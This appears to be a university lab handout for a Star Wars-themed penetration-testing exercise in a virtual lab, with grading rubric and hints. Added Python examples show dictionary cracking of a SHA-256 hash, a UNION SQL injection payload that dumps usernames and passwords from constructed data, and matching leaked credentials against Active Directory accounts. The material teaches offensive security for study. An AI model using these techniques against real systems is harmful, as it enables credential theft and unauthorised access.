In this lab you will work in teams of 2-3 people (you may opt to work alone if you want to). You will practice the use of various hacking tools and techniques in a multi-stage scenario involving systems of various ages and operating systems; each level leads to the next one. You may divide up the tasks as you like, or compete to see who solves each part first, but the mark is collective: everyone in the team receives the same mark. You will submit as a group, so there should be only one submitted document, with all your names on it.
Note: For this lab to work at home, you should set up your home config to match the labs. Please refer to the video on that topic and contact me if you are having issues with it.
Part 1:
In a galaxy far, far away, the Empire is trying to build Death Star 2.0.
Rebel forces are looking for information on a long-lost device that used to
belong to Han Solo in the previous war. This takes you to a remote part of the
Galaxy to a system called vmnet1. Here you must gain access to Han Solo’s system
and hopefully find the information you need to hack into the Death Star system and
bring an end to the threat that the Empire represents to the free republic worlds…
Your first task in this mission is to gain access to R2D2’s data. The memory of the droid R2D2 has been recovered, but some of it is encrypted. A SHA256 hash of the password to the encrypted data was also recovered, but a hash cannot be reversed. Using the Droid Dictionary provided, you must crack the hash (hash each candidate word and compare the result against the recovered hash) and use the password to extract the information that will allow you to boot up and access Han Solo’s device on vmnet1.
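The following is an added worked example of the dictionary attack described above; it is not part of the lab materials. The wordlist and the hashes it matches are constructed here for illustration (the real R2D2 hash and the Droid Dictionary are supplied with the lab), and the small set of mangling rules is an assumption about how lab passwords are typically built from a dictionary word.

```python
"""Dictionary attack on a SHA-256 password hash.

Added example, not part of the lab handout. The wordlist below is a
constructed stand-in for the Droid Dictionary; the real hash and dictionary
are supplied with the lab.
"""
import hashlib

# Constructed stand-in for the Droid Dictionary (one candidate per line).
DROID_DICTIONARY = """\
beep
boop
whistle
r2d2rules
millenniumfalcon
kesselrun
"""


def sha256_hex(candidate: str) -> str:
    """Return the lowercase hex SHA-256 digest of a candidate password."""
    return hashlib.sha256(candidate.encode("utf-8")).hexdigest()


def _variations(word: str):
    """Cheap mangling rules (an assumption about how lab passwords are built):
    the word as written, case variants, a trailing digit, a trailing '!'."""
    yield word
    yield word.lower()
    yield word.upper()
    yield word.capitalize()
    for n in range(10):
        yield f"{word}{n}"
    yield word + "!"


def crack_sha256(target_hex: str, wordlist: str, mangle: bool = True):
    """Return the first candidate whose SHA-256 equals target_hex, or None.

    SHA-256 is a fast, unsalted hash, so every dictionary word (and each
    mangled variant) can be tried at essentially no cost; that is why an
    unsalted SHA-256 of a dictionary password offers no real protection.
    The digest is compared as lowercase hex, so the target may be supplied
    in either case.
    """
    target = target_hex.strip().lower()
    if len(target) != 64 or any(c not in "0123456789abcdef" for c in target):
        raise ValueError("target is not a hex-encoded SHA-256 digest")
    for line in wordlist.splitlines():
        word = line.strip()
        if not word:
            continue
        for cand in (_variations(word) if mangle else (word,)):
            if sha256_hex(cand) == target:
                return cand
    return None


if __name__ == "__main__":
    # Constructed target: the hash of a word we know is in the dictionary.
    demo_hash = sha256_hex("kesselrun")
    print("recovered password:", crack_sha256(demo_hash, DROID_DICTIONARY))
```

The same attack with John the Ripper, which the Part 1 hint links to, amounts to putting the hex digest in a file and running it with the `raw-sha256` format and the Droid Dictionary as the wordlist; the hash-formats cheat sheet shows what the input line must look like. Whichever tool you use, the security point is the same: an unsalted fast hash of a dictionary word is recovered in milliseconds.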
Han’s device is encrypted with a boot password and has a separate login password. If you recover the boot password from R2D2’s memory, you will still have to hack into Han’s running system using whatever techniques you have available to you. Once you have access to the system, you will find a document that contains information about an IP address and URL needed for the next stage of your mission. Beware of booby traps!
Deliverable01: Replace the text highlighted in red with R2D2’s encryption password and describe how you cracked it. Identify which team member(s) worked on this part, describe how you acquired the password and what tools you used.
Deliverable02: Replace the text highlighted in red with the boot password to HanS-PC. Identify which team member(s) worked on this part, describe how you acquired the password and what tools you used.
Deliverable03: Replace the text highlighted in red with the URL contained in the document on Han’s system. Identify which team member(s) worked on this part, describe how you acquired the URL and what tools you used to gain access to the system, as well as any difficulties you encountered.
Part 2:
Having obtained the coordinates (IP address) of the next target of your mission,
you must now hack your way into the computer system on Cloud City. The goal
is not to gain physical access to the system but to extract username and password
data from the online database. This will involve an SQL injection attempt. Cloud City
stores login information for both rebels and empire customers. The hope is that some of
these credentials can be used to access empire systems and then escalate privileges…
Your task in this part is to use the IP address and URL that you obtained in part 1 to access the Cloud City server and extract the user credentials stored there by means of SQL injection. If you can obtain the same information in a different way, that will be considered equivalent provided it involves hacking techniques; for example, gaining root access to the server and reading the stored database directly. One of these username/password combinations will give you access to the next system, the Star Destroyer. Your one restriction is that you can’t modify or add virtual hardware.
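The following is an added example of the SQL injection technique this part asks for; it is not the lab's code and not the Cloud City application's code. The schema, the rows and the shape of the search function are constructed so the example runs offline against an in-memory SQLite database; the real target's schema, table names and column counts are unknown here and must be discovered on the live system.

```python
"""UNION-based SQL injection, shown against a constructed SQLite database.

Added example, not the lab's or Cloud City's code. The products/users
schema and the search function below are assumptions that stand in for
whatever the real web application does with its search parameter.
"""
import sqlite3


def build_db() -> sqlite3.Connection:
    """In-memory stand-in for the Cloud City database (constructed data)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products(id INTEGER PRIMARY KEY, name TEXT, price REAL);
        CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO products(name, price) VALUES ('carbonite', 99.5), ('tibanna gas', 12.0);
        INSERT INTO users(username, password) VALUES
            ('lando', 'cloudcity1'), ('lobot', 'headband'), ('vader', 'n0tyourfather');
    """)
    return db


def search_vulnerable(db, term: str):
    """The kind of code that makes an application injectable: the user-supplied
    search term is spliced straight into the SQL text."""
    sql = f"SELECT name, price FROM products WHERE name LIKE '%{term}%'"
    return db.execute(sql).fetchall()


def search_safe(db, term: str):
    """Same query with a bound parameter: the payload is treated as data, never
    as SQL, so the UNION never executes."""
    sql = "SELECT name, price FROM products WHERE name LIKE ?"
    return db.execute(sql, (f"%{term}%",)).fetchall()


def find_column_count(db, max_cols: int = 8):
    """Step 1 of a UNION attack: learn how many columns the original SELECT
    returns by appending UNION SELECT NULL,... with growing arity until the
    database stops raising a column-count mismatch."""
    for n in range(1, max_cols + 1):
        nulls = ",".join(["NULL"] * n)
        try:
            search_vulnerable(db, f"x' UNION SELECT {nulls} --")
            return n
        except sqlite3.OperationalError:
            continue
    return None


# Step 2: a term that matches no product, then close the string literal,
# UNION in two columns (matching the original SELECT) from the users table,
# and comment out the rest of the original query ('--' starts a comment in
# SQLite, MySQL and PostgreSQL).
UNION_PAYLOAD = "nomatch' UNION SELECT username, password FROM users --"


def dump_users_via_injection(db):
    """Return the (username, password) rows the injection leaks."""
    rows = search_vulnerable(db, UNION_PAYLOAD)
    # Every row should come from users since no product name ends in
    # 'nomatch'; filter on the type anyway in case the LIKE matched something.
    return [(u, p) for (u, p) in rows if isinstance(p, str)]


if __name__ == "__main__":
    db = build_db()
    print("columns in original SELECT:", find_column_count(db))
    for user, pw in dump_users_via_injection(db):
        print(f"{user}:{pw}")
    print("safe version returns:", search_safe(db, UNION_PAYLOAD))
```

Against a real application you do the same two steps through the HTTP parameter (or with a tool that automates them), and the table and column names have to be found first, typically by querying the database's own catalogue through the same injection point. Note how `search_safe` makes the identical payload harmless: that is the fix you would recommend in a report.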
Deliverable04: Replace the text highlighted in red with the username and password that gives you access to the Star Destroyer system. Identify which team member(s) worked on this part, describe how you acquired the usernames/passwords and what techniques you used, as well as any difficulties you encountered.
Part 3:
Your team now has access to the Star Destroyer, but your access is limited. You need
to establish communications with the Empire so that you can leverage your newfound
access. To do this, you need to escalate privileges on the Star Destroyer and gain enough
rights to establish network communication with the Empire. You need to find out which accounts
that you extracted from Cloud City are usable on Empire systems. You also need to figure
out which accounts you can make use of to take you to the next stage of your mission…
Your task in this part is to log onto the Star Destroyer with an account that you harvested in the last part and gain enough privileges to enable the NIC. Once that is done, you need to get a list of all the accounts that have valid domain accounts by querying EMPIRE.GOV Active Directory. You can use any tools you like to accomplish this (adfind.exe and PowerShell should both work in this respect, but there are other ways as well), but you can’t modify or add any virtual hardware.
Cross-reference your list of domain users with the data dump from Cloud City and confirm the domain accounts whose passwords you already have. A username that appears in both lists is only a candidate until you have actually authenticated with it; when you test candidates, keep the number of attempts per account low so that you do not lock the accounts out.
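The following is an added example of the cross-referencing step; it is not part of the lab. The AdFind output is a constructed excerpt in the `>attribute: value` record format AdFind prints for a query such as `adfind -b DC=empire,DC=gov -f "objectCategory=person" sAMAccountName`, and the Cloud City dump is assumed to have been saved as one `username:password` per line; both are made-up data. The normalisation of `DOMAIN\user` and `user@domain` forms is the part worth getting right, since the same account shows up under different spellings in different sources.

```python
"""Cross-reference AD sAMAccountNames with a credential dump.

Added example, not part of the lab. Both inputs are constructed; the dump
format (username:password per line) is an assumption about how you saved
the Cloud City data.
"""
import re

# Constructed excerpt of AdFind's record output for a sAMAccountName query.
ADFIND_OUTPUT = """\
dn:CN=Darth Vader,CN=Users,DC=empire,DC=gov
>sAMAccountName: vader

dn:CN=Grand Moff Tarkin,CN=Users,DC=empire,DC=gov
>sAMAccountName: tarkin

dn:CN=Lobot,CN=Users,DC=empire,DC=gov
>sAMAccountName: Lobot

3 Objects returned
"""

# Constructed credential dump. Note the mixed spellings of the same account.
CLOUD_CITY_DUMP = """\
lando:cloudcity1
EMPIRE\\vader:n0tyourfather
lobot@empire.gov:headband
Tarkin:moffmoff
solo:chewie
"""


def parse_adfind_samaccountnames(text: str) -> set:
    """Collect every '>sAMAccountName: value' line, lowercased."""
    names = set()
    for line in text.splitlines():
        m = re.match(r"^>sAMAccountName:\s*(\S+)", line)
        if m:
            names.add(m.group(1).lower())
    return names


def normalize_username(raw: str, domain: str = "empire.gov") -> str:
    """Reduce 'EMPIRE\\vader', 'vader@empire.gov' and 'Vader' to 'vader'.

    A UPN for some other domain is left intact so it cannot be mistaken
    for an EMPIRE.GOV account that merely shares the local part."""
    name = raw.strip()
    if "\\" in name:
        name = name.rsplit("\\", 1)[1]
    if "@" in name:
        local, _, dom = name.rpartition("@")
        if dom.lower() == domain.lower():
            name = local
    return name.lower()


def parse_dump(text: str) -> dict:
    """Map normalised username -> password. Passwords may contain ':'; only
    the first colon separates the fields."""
    creds = {}
    for line in text.splitlines():
        if not line.strip() or ":" not in line:
            continue
        user, _, pw = line.partition(":")
        creds[normalize_username(user)] = pw
    return creds


def usable_domain_accounts(adfind_text: str, dump_text: str) -> dict:
    """Domain accounts for which the dump holds a candidate password."""
    domain_users = parse_adfind_samaccountnames(adfind_text)
    creds = parse_dump(dump_text)
    return {u: creds[u] for u in sorted(domain_users & creds.keys())}


if __name__ == "__main__":
    for user, pw in usable_domain_accounts(ADFIND_OUTPUT, CLOUD_CITY_DUMP).items():
        print(f"candidate: EMPIRE\\{user} / {pw}")
```

The result is a candidate list, not a confirmed one: a matching username only tells you the Cloud City password might have been reused on the domain. Confirm each candidate with a single authentication attempt (for instance, mapping a share or running one AD query with those credentials) and stop before the domain lockout threshold; that confirmed subset is what Deliverable05 asks for.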
Deliverable05: Replace the text highlighted in red with a list of all the domain users in EMPIRE.GOV whose passwords you already have. Identify which team member(s) worked on this part, describe how you elevated privileges, and state what tools you used to query AD.
Part 4:
The new republic has discovered that the remnants of Death Star 1.0 are still
in use by the Empire. Although no longer a threat, they have used the older
Death Star as a template to build the new and improved one. Your mission is
to try to gain access to the old Death Star in the hope that you can use that
access to gain some leverage over the much more secure Death Star 2.0 and
hopefully turn this new weapon on the empire itself, thereby winning the war…
Your task in this part is to take the accounts that you gathered in part 3 and attempt to use them to log into the old Death Star. Once you have logged into Death Star 1.0, you will find the emperor already logged into the system. Use your access and hacking tools to determine the emperor’s login information and apply it to gain access to Death Star 2.0. Note that both servers must be on at the same time and must not be rebooted (a reboot would end the emperor’s logged-in session); they can be suspended.
Deliverable06: Replace the text highlighted in red with the username and password of the account that gets you access to Deathstar1.0.
Deliverable07: Replace the text highlighted in red with the emperor’s credentials that get you access to Deathstar2.0. Identify which team member(s) worked on this part, describe how you acquired the password and what tools you used to do so. Provide a screenshot of that account logged onto Deathstar2.0 and identify any difficulties that you encountered.
Finally, provide some feedback on how you liked the lab and what recommendations you would make for improvement. Below you’ll find the rubric so that you can see how you are evaluated.
LAB3 RUBRIC
Section: Marks
Deliverable01: /15 (full marks only if your password comes with a description of how you got it; half marks otherwise)
Deliverable02: /5 (full marks only if your password comes with a description of how you got it; half marks otherwise)
Deliverable03: /15 (full marks only if the URL comes with a detailed description of how you got it; half marks otherwise)
Deliverable04: /15 (full marks only if your password comes with a detailed description of how you got the username/password list; half marks otherwise)
Deliverable05: /15 (full marks only if your users/passwords come with a description of how you escalated privileges and queried AD; half marks otherwise)
Deliverable06: /5 (full marks only if your password comes with a description of how you accessed Deathstar1.0; half marks otherwise)
Deliverable07: /20 (full marks only if your password comes with a detailed description of how you acquired the emperor’s password; half marks otherwise)
Lab Discussion: /10 (full marks if all participants provide feedback)
Total: /100
See below for hints for each part. If you are stuck for ideas, you can consult these resources; if you enjoy the challenge, don’t read any further.
Part 1 hints:
http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats
http://gnuwin32.sourceforge.net/packages/file.htm
Part 2 hints:
Part 3 hints:
http://www.joeware.net/freetools/tools/adfind/
Part 4 hints: